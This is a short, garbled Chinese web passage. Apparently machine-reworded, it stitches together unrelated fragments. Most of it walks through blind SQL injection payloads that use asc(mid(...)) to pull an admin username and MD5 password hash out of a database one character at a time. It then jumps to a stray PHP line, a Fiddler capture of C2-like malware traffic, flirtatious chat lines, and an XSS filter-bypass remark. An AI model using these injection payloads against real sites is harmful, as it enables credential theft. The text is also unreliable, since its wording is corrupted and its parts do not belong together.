图片6：被侵略IP的国家散布概略得到admin列名里的内容之一位是97 第二位是100 ......admin列名剩余的3位就不上图了最终分别是↓97 100 109 105 110对照着上面的Ascii表，内容便是 a d m i n 。 现在咱们取得了admin列的内容，然后咱们还差password的内容要获取。 因为和上面办法无差别，就不上图了。 句子如下↓↓↓↓↓↓↓and (select top 1 asc(mid(password,1,1)) from 表)=成果and (select top 1 asc(mid(password,2,1)) from 表)=成果and (select top 1 asc(mid(password,3,1)) from 表)=成果................................此处省掉那一晚...............................and (select top 1 asc(mid(password,16,1)) from 表)=成果最终成果为：97 52 56 101 49 57 48 102 97 102 99 50 53 55 100 51 然后把这些Ascii码对着上面的表转化一下。 得出咱们的暗码MD5a48e190fafc257d3最终得到账号：admin 暗码a48e190fafc257d3$html.= $apisecret;　　图片4显现的是运用Fiddler获取感染数据的进程。 在这一操作中，受感染的虚拟机发送了一个相似C2恳求的信息，而且接纳到了一个很长的，而且是通过加密的回来音讯。 小i提示：我：还能够哦，有电脑就行。 我就感觉你挺不错的。 环境什么的没感觉（妹纸脸红红的）

}可是这个过滤处理实在是太简略了，首要咱们只需运用大写的就能够绕过，其次XSS也并非只能运用JavaScript，经过HTML句子也能够跨站，比方“”句子。